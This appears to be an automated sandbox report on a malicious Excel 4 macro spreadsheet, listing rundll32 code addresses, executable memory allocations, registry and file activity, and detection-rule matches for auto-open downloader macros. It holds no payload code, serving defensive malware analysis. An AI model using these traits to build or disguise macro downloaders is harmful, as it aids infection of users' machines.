Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004404DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004268DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004364F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004288F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004244FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00426083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043CC89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043109E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043129C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004304B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00433D41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00430946
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042BB4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042194C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00432753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00421950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043A156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00434B56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042F154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00440D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042AB66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00438D71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042777B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042C309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042BD0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042911A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042472E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00430D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043FF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00437BCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043D3C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042CFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004345CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00432BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043EBFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00427B82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00439186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043C38F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042F58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0042FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00441993
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00421F9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00422FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004341A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_004399AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0043C9A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00423FB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00479700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00485CF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00485040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004770ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00476083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048109E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047F154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048A156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047911A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00489186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004841A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047E243
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048026B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048129C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047C309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048D3C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048C38F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048B391
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0049146E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047B41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048A429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048542E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004874DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004904DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004864F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004744FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048E498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004804B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00483512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004845CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047F58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00478650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00493672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048561F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048363D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00482753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047777B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047472E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047C850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00486864
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047E86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00490867
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047B821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00472830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00481831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004768DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048D8D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004788F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047194C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00480946
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00471950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00491993
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048C9A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_004899AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047CA43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00479A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00476A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047BB4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00491B54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00484B56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047AB66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00487BCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048EBFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00482BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00477B82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00476C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048ACD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048CC89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047EC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00483D41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00490D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00488D71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047BD0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00480D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00478D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00476ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048BE8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048EE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0048FF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0047CFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00471F9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00472FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00473FB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002704B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027BE8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027EE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026EC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027E498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002670ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00275CF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002774DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00269700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00273512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00281B54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00268D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027B391
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026B821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027542E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027A429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00266C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00271831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00262830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027363D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027561F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00266A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026B41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00276864
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0028146E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026E86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027026B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00280867
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00283672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00269A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026CA43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026E243
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00275040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026C850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00268650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00266083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027CC89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027109E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027129C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002688F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002764F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002644FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00266ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027D8D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027ACD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002804DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002668DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026472E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00270D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027FF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026BD0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026C309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026911A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026AB66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00278D71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026777B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00270946
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00273D41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026194C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026BB4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027A156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00274B56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026F154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00280D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00272753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00261950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002741A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00262FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002799AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027C9A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00263FB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00279186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00267B82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027C38F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026F58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00281993
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00261F9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00272BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027EBFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0026CFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002745CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00277BCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0027D3C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00345CF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00339700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00332830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00341831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034363D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033B821
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00336C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034542E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034A429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033B41A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034561F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00336A1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00353672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00339A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00346864
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00350867
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033E86A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0035146E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034026B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033C850
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00338650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033CA43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033E243
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00345040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003404B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034EE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033EC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034129C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033AE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034109E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034E498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00336083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034BE8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034CC89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003464F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003388F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003344FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003370ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034D8D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00336ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034ACD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003474DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003504DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003368DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034FF31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00340D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033472E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00343512
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033911A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033C309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033BD0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00348D71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033777B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033AB66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00351B54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034A156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00344B56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00331950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033F154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00342753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00350D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00340946
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00343D41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033BB4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033194C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00333FB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00332FA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003441A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034C9A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003499AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034B391
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00338D95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00351993
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00331F9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00337B82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00349186
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034C38F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033F58F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00342BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034EBFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_003445CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0034D3C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0033CFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00347BCA

Source: 3DBB.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 80_513972285.xls	Macro extractor: Sheet name: Macro1
Source: 80_513972285.xls	Macro extractor: Sheet name: Macro1

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_0026C67D DeleteService,

Source: 80_513972285.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 80_513972285.xls, type: SAMPLE	Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED	Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Klovgjl\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100359C1 appears 46 times

Source: 80_513972285.xls	OLE indicator, VBA macros: true
Source: 80_513972285.xls.0.dr	OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/9@2/36

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 80_513972285.xls	OLE indicator, Workbook stream: true
Source: 80_513972285.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,

Source: 80_513972285.xls

ReversingLabs: Detection: 33%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

